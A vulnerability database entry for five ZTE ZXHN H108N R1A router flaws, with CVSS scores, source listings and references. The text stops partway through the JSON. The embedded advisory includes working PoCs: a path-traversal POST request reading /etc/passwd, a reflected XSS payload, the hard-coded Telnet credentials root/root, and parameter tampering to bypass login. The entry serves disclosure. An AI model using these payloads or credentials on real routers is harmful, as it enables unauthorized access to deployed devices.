var-201512-0231
Vulnerability from variot
ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE have a hardcoded password of root for the root account, which allows remote attackers to obtain administrative access via a TELNET session. ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. In addition, JVNVU#91514956 Then CWE-798 It is published as CWE-798: Use of Hard-coded Credentials http://cwe.mitre.org/data/definitions/798.htmlBy a third party TELNET Administrative access may be gained through the session. ZTE ZXHN H108N R1A is a wireless router product of China ZTE Corporation. When the system enables the Telnet service, the remote attacker can exploit the vulnerability to fully control the device. ZTE ZXHN H108N R1A routers are prone to the following security vulnerabilities: 1. Multiple information-disclosure vulnerabilities 2. An authorization-bypass vulnerability 3. A directory-traversal vulnerability 4. A hard-coded credentials vulnerability 5. A cross-site scripting vulnerability Attackers can exploit these issues to gain access to the browser of an unsuspecting user and execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, gain access to sensitive information, read arbitrary files, or bypass security restrictions and perform unauthorized actions. This may aid in further attacks. CVE-ID: CVE-2015-7248 CVE-2015-7249 CVE-2015-7250 CVE-2015-7251 CVE-2015-7252
Note: Large deployment size, primarily in Peru, used by TdP.
Description CWE-200 https://cwe.mitre.org/data/definitions/200.html: Information Exposure - CVE-2015-7248 Multiple information exposure vulnerabilities enable an attacker to obtain credentials and other sensitive details about the ZXHN H108N R1A. A. User names and password hashes can be viewed in the page source of http:///cgi-bin/webproc
PoC:
Login Page source contents:
...snip.... //get user info var G_UserInfo = new Array(); var m = 0; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "admin"; //UserName G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here G_UserInfo[m][2] = "1"; //Level G_UserInfo[m][3] = "1"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "user"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "2"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "support"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "3"; //Index m++; ...snip...
B. The configuration file of the device contains usernames, passwords, keys, and other values in plain text, which can be used by a user with lower privileges to gain admin account access. This issue also affects ZTE ZXV10 W300 models, version W300V1.0.0f_ER1_PE.
CWE-285 https://cwe.mitre.org/data/definitions/285.html: Improper Authorization - CVE-2015-7249
By default, only admin may authenticate directly with the web administration pages in the ZXHN H108N R1A. By manipulating parameters in client-side requests, an attacker may authenticate as another existing account, such as user or support, and may be able to perform actions otherwise not allowed.
PoC 1: 1. Login page user drop-down option shows only admin only. 2. Use an intercepting proxy / Tamper Data - and intercept the Login submit request. 3. Change the username admin to user / support and continue Login. 4. Application permits other users to log in to mgmt portal.
PoC 2: After logging in as support, some functional options are visibly restricted. Certain actions can still be performed by calling the url directly. Application does not perform proper AuthZ checks.
Following poc is a change password link. It is accessible directly, though it (correctly) is restricted to changing normal user (non-admin) password only.
http:// /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd
Other functions / pages may also be accessible to non-privileged users.
CWE-22 http://cwe.mitre.org/data/definitions/22.html: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - CVE-2015-7250
The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter which takes an unrestricted file path as input, allowing an attacker to read arbitrary files on the system.
Arbitrary files can be read off of the device. No authentication is required to exploit this vulnerability.
PoC
HTTP POST request
POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177
getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a
HTTP Response
HTTP/1.0 200 OK Contenttype: text/html Pragma: nocache CacheControl: nocache setcookie: sessionid=7ce7bd4a; expires=Fri, 31Dec9999 23:59:59 GMT;path=/
root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
tw:x:504:504::/home/tw:/bin/bash
tw:x:504:504::/home/tw:/bin/msh
CWE-798 http://cwe.mitre.org/data/definitions/798.html: Use of Hard-coded Credentials - CVE-2015-7251
In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible using the hard-coded credentials 'root' for both the username and password.
CWE-79 https://cwe.mitre.org/data/definitions/79.html: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2015-7252
In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is vulnerable to reflected cross-site scripting [pre-authentication].
PoC
POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177
getpage=html%2Findex.html&errorpage=html%2fmain.htmlalert(1)&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a
+++++
Best Regards, Karn Ganeshen
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201512-0231",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxhn h108n r1a",
"scope": "lte",
"trust": 1.0,
"vendor": "zte",
"version": "zte.bhs.zxhnh108nr1a.h_pe"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h108n r1a",
"scope": null,
"trust": 0.8,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h108n r1a",
"scope": "lt",
"trust": 0.8,
"vendor": "zte",
"version": "zte.bhs.zxhnh108nr1a.k_pe"
},
{
"model": "zxhn h108n r1a zte.bhs.zxhnh108nr1a.h pe",
"scope": null,
"trust": 0.6,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h108n r1a",
"scope": "eq",
"trust": 0.6,
"vendor": "zte",
"version": "zte.bhs.zxhnh108nr1a.h_pe"
},
{
"model": "zxv10 w300 w300v1.0.0f er1 pe",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h108n r1a zte.bhs.zxhnh108nr1a",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h108n r1a zte.bhs.zxhnh108nr1a",
"scope": "ne",
"trust": 0.3,
"vendor": "zte",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#391604"
},
{
"db": "CNVD",
"id": "CNVD-2015-07626"
},
{
"db": "BID",
"id": "77421"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006590"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-239"
},
{
"db": "NVD",
"id": "CVE-2015-7251"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:zte:zxhn_h108n_r1a",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:zte:zxhn_h108n_r1a_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-006590"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Karn Ganeshen",
"sources": [
{
"db": "BID",
"id": "77421"
},
{
"db": "PACKETSTORM",
"id": "134492"
}
],
"trust": 0.4
},
"cve": "CVE-2015-7251",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2015-7251",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2015-07626",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-85212",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2015-7251",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-7251",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2015-7251",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2015-07626",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201511-239",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-85212",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-7251",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07626"
},
{
"db": "VULHUB",
"id": "VHN-85212"
},
{
"db": "VULMON",
"id": "CVE-2015-7251"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006590"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-239"
},
{
"db": "NVD",
"id": "CVE-2015-7251"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE have a hardcoded password of root for the root account, which allows remote attackers to obtain administrative access via a TELNET session. ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. In addition, JVNVU#91514956 Then CWE-798 It is published as CWE-798: Use of Hard-coded Credentials http://cwe.mitre.org/data/definitions/798.htmlBy a third party TELNET Administrative access may be gained through the session. ZTE ZXHN H108N R1A is a wireless router product of China ZTE Corporation. When the system enables the Telnet service, the remote attacker can exploit the vulnerability to fully control the device. ZTE ZXHN H108N R1A routers are prone to the following security vulnerabilities:\n1. Multiple information-disclosure vulnerabilities\n2. An authorization-bypass vulnerability\n3. A directory-traversal vulnerability\n4. A hard-coded credentials vulnerability\n5. A cross-site scripting vulnerability\nAttackers can exploit these issues to gain access to the browser of an unsuspecting user and execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, gain access to sensitive information, read arbitrary files, or bypass security restrictions and perform unauthorized actions. This may aid in further attacks. \n*CVE-ID*:\nCVE-2015-7248\nCVE-2015-7249\nCVE-2015-7250\nCVE-2015-7251\nCVE-2015-7252\n\n*Note*: Large deployment size, primarily in Peru, used by TdP. \n\nDescription\n*CWE-200* \u003chttps://cwe.mitre.org/data/definitions/200.html\u003e*: Information\nExposure* - CVE-2015-7248\nMultiple information exposure vulnerabilities enable an attacker to obtain\ncredentials and other sensitive details about the ZXHN H108N R1A. \nA. User names and password hashes can be viewed in the page source of\nhttp://\u003cIP\u003e/cgi-bin/webproc\n\nPoC:\n\nLogin Page source contents:\n\n...snip.... \n//get user info\nvar G_UserInfo = new Array();\nvar m = 0;\nG_UserInfo[m] = new Array();\nG_UserInfo[m][0] = \"admin\"; //UserName\nG_UserInfo[m][1] = \"$1$Tsnipped/; //Password Hash seen here\nG_UserInfo[m][2] = \"1\"; //Level\nG_UserInfo[m][3] = \"1\"; //Index\nm++;\nG_UserInfo[m] = new Array();\nG_UserInfo[m][0] = \"user\"; //UserName\nG_UserInfo[m][1] = \"$1$Tsnipped\"; //Password Hash seen here\nG_UserInfo[m][2] = \"2\"; //Level\nG_UserInfo[m][3] = \"2\"; //Index\nm++;\nG_UserInfo[m] = new Array();\nG_UserInfo[m][0] = \"support\"; //UserName\nG_UserInfo[m][1] = \"$1$Tsnipped\"; //Password Hash seen here\nG_UserInfo[m][2] = \"2\"; //Level\nG_UserInfo[m][3] = \"3\"; //Index\nm++;\n...snip... \n\nB. The configuration file of the device contains usernames, passwords,\nkeys, and other values in plain text, which can be used by a user with\nlower privileges to gain admin account access. This issue also affects ZTE\nZXV10 W300 models, version W300V1.0.0f_ER1_PE. \n\n\n*CWE-285* \u003chttps://cwe.mitre.org/data/definitions/285.html\u003e*: Improper\nAuthorization* - CVE-2015-7249\n\nBy default, only admin may authenticate directly with the web\nadministration pages in the ZXHN H108N R1A. By manipulating parameters in\nclient-side requests, an attacker may authenticate as another existing\naccount, such as user or support, and may be able to perform actions\notherwise not allowed. \n\nPoC 1:\n1. Login page user drop-down option shows only admin only. \n2. Use an intercepting proxy / Tamper Data - and intercept the Login submit\nrequest. \n3. Change the username admin to user / support and continue Login. \n4. Application permits other users to log in to mgmt portal. \n\nPoC 2:\nAfter logging in as support, some functional options are visibly\nrestricted. Certain actions can still be performed by calling the url\ndirectly. Application does not perform proper AuthZ checks. \n\nFollowing poc is a change password link. It is accessible directly, though\nit (correctly) is restricted to changing normal user (non-admin) password\nonly. \n\nhttp://\n\u003cIP\u003e/cgi-bin/webproc?getpage=html/index.html\u0026var:menu=maintenance\u0026var:page=accessctrl\u0026var:subpage=accountpsd\n\nOther functions / pages may also be accessible to non-privileged users. \n\n\n*CWE-22* \u003chttp://cwe.mitre.org/data/definitions/22.html\u003e*: Improper\nLimitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) *-\nCVE-2015-7250\n\nThe webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter\nwhich takes an unrestricted file path as input, allowing an attacker to\nread arbitrary files on the system. \n\nArbitrary files can be read off of the device. No authentication is\nrequired to exploit this vulnerability. \n\nPoC\n\nHTTP POST request\n\nPOST /cgi\u00adbin/webproc HTTP/1.1\nHost: IP\nUser\u00adAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101\nFirefox/18.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept\u00adLanguage: en\u00adUS,en;q=0.5\nAccept\u00adEncoding: gzip, deflate\nReferer: https://IP/cgi\u00adbin/webproc\nCookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin\nConnection: keep\u00adalive\nContent\u00adType: application/x\u00adwww\u00adform\u00adurlencoded\nContent\u00adLength: 177\n\ngetpage=html%2Findex.html\u0026errorpage=%2fetc%2fpasswd\u0026var%3Amenu=setup\u0026var%3Apage=wancfg\u0026obj\u00ad\naction=auth\u0026%3Ausername=admin\u0026%3Apassword=admin\u0026%3Aaction=login\u0026%3Asessionid=7ce7bd4a\n\n\nHTTP Response\n\nHTTP/1.0 200 OK\nContent\u00adtype: text/html\nPragma: no\u00adcache\nCache\u00adControl: no\u00adcache\nset\u00adcookie: sessionid=7ce7bd4a; expires=Fri, 31\u00adDec\u00ad9999 23:59:59\nGMT;path=/\n\n#root:x:0:0:root:/root:/bin/bash\nroot:x:0:0:root:/root:/bin/sh\n#tw:x:504:504::/home/tw:/bin/bash\n#tw:x:504:504::/home/tw:/bin/msh\n\n\n*CWE-798* \u003chttp://cwe.mitre.org/data/definitions/798.html\u003e*: Use of\nHard-coded Credentials* - CVE-2015-7251\n\nIn the ZXHN H108N R1A, the Telnet service, when enabled, is accessible\nusing the hard-coded credentials \u0027root\u0027 for both the username and password. \n\n*CWE-79* \u003chttps://cwe.mitre.org/data/definitions/79.html\u003e*: Improper\nNeutralization of Input During Web Page Generation (\u0027Cross-site\nScripting\u0027) *- CVE-2015-7252\n\nIn the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is\nvulnerable to reflected cross-site scripting [pre-authentication]. \n\nPoC\n\nPOST /cgi\u00adbin/webproc HTTP/1.1\nHost: IP\nUser\u00adAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101\nFirefox/18.0 Accept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept\u00adLanguage: en\u00adUS,en;q=0.5\nAccept\u00adEncoding: gzip, deflate\nReferer: https://IP/cgi\u00adbin/webproc\nCookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin\nConnection: keep\u00adalive\nContent\u00adType: application/x\u00adwww\u00adform\u00adurlencoded\nContent\u00adLength: 177\n\ngetpage=html%2Findex.html\u0026*errorpage*=html%2fmain.html\u003cscript\u003ealert(1)\u003c/script\u003e\u0026var%3Amenu=setup\u0026var%3Apage=wancfg\u0026obj\u00ad\naction=auth\u0026%3Ausername=admin\u0026%3Apassword=admin\u0026%3Aaction=login\u0026%3Asessionid=7ce7bd4a\n\n\n\n+++++\n-- \nBest Regards,\nKarn Ganeshen\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7251"
},
{
"db": "CERT/CC",
"id": "VU#391604"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006590"
},
{
"db": "CNVD",
"id": "CNVD-2015-07626"
},
{
"db": "BID",
"id": "77421"
},
{
"db": "VULHUB",
"id": "VHN-85212"
},
{
"db": "VULMON",
"id": "CVE-2015-7251"
},
{
"db": "PACKETSTORM",
"id": "134492"
}
],
"trust": 3.42
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-85212",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=38773",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85212"
},
{
"db": "VULMON",
"id": "CVE-2015-7251"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#391604",
"trust": 4.3
},
{
"db": "NVD",
"id": "CVE-2015-7251",
"trust": 3.6
},
{
"db": "BID",
"id": "77421",
"trust": 1.5
},
{
"db": "EXPLOIT-DB",
"id": "38773",
"trust": 1.2
},
{
"db": "JVN",
"id": "JVNVU91514956",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006590",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2015-07626",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201511-239",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "134492",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-85212",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-7251",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#391604"
},
{
"db": "CNVD",
"id": "CNVD-2015-07626"
},
{
"db": "VULHUB",
"id": "VHN-85212"
},
{
"db": "VULMON",
"id": "CVE-2015-7251"
},
{
"db": "BID",
"id": "77421"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006590"
},
{
"db": "PACKETSTORM",
"id": "134492"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-239"
},
{
"db": "NVD",
"id": "CVE-2015-7251"
}
]
},
"id": "VAR-201512-0231",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07626"
},
{
"db": "VULHUB",
"id": "VHN-85212"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07626"
}
]
},
"last_update_date": "2024-11-23T21:43:34.202000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.zte.co.jp/"
},
{
"title": "ZTE ZXHN H108N R1A default account permissions bypass vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/66795"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07626"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006590"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85212"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006590"
},
{
"db": "NVD",
"id": "CVE-2015-7251"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.6,
"url": "https://www.kb.cert.org/vuls/id/391604"
},
{
"trust": 2.6,
"url": "https://www.kb.cert.org/vuls/id/bluu-9zdjwa"
},
{
"trust": 1.3,
"url": "https://www.exploit-db.com/exploits/38773/"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/77421"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/285.html"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/288.html"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7251"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu91514956/index.html"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-7251"
},
{
"trust": 0.3,
"url": "http://www.zte.com.cn/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/255.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/134492/zte-zxhn-h108n-r1a-zxv10-w300-traversal-disclosure-authorization.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html\u003e*:"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7250"
},
{
"trust": 0.1,
"url": "http://cwe.mitre.org/data/definitions/22.html\u003e*:"
},
{
"trust": 0.1,
"url": "http://cwe.mitre.org/data/definitions/798.html\u003e*:"
},
{
"trust": 0.1,
"url": "https://www.zte.com.cn]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7249"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7252"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7248"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e/cgi-bin/webproc"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/285.html\u003e*:"
},
{
"trust": 0.1,
"url": "https://ip/cgi\u00adbin/webproc"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html\u003e*:"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7251"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#391604"
},
{
"db": "CNVD",
"id": "CNVD-2015-07626"
},
{
"db": "VULHUB",
"id": "VHN-85212"
},
{
"db": "VULMON",
"id": "CVE-2015-7251"
},
{
"db": "BID",
"id": "77421"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006590"
},
{
"db": "PACKETSTORM",
"id": "134492"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-239"
},
{
"db": "NVD",
"id": "CVE-2015-7251"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#391604"
},
{
"db": "CNVD",
"id": "CNVD-2015-07626"
},
{
"db": "VULHUB",
"id": "VHN-85212"
},
{
"db": "VULMON",
"id": "CVE-2015-7251"
},
{
"db": "BID",
"id": "77421"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006590"
},
{
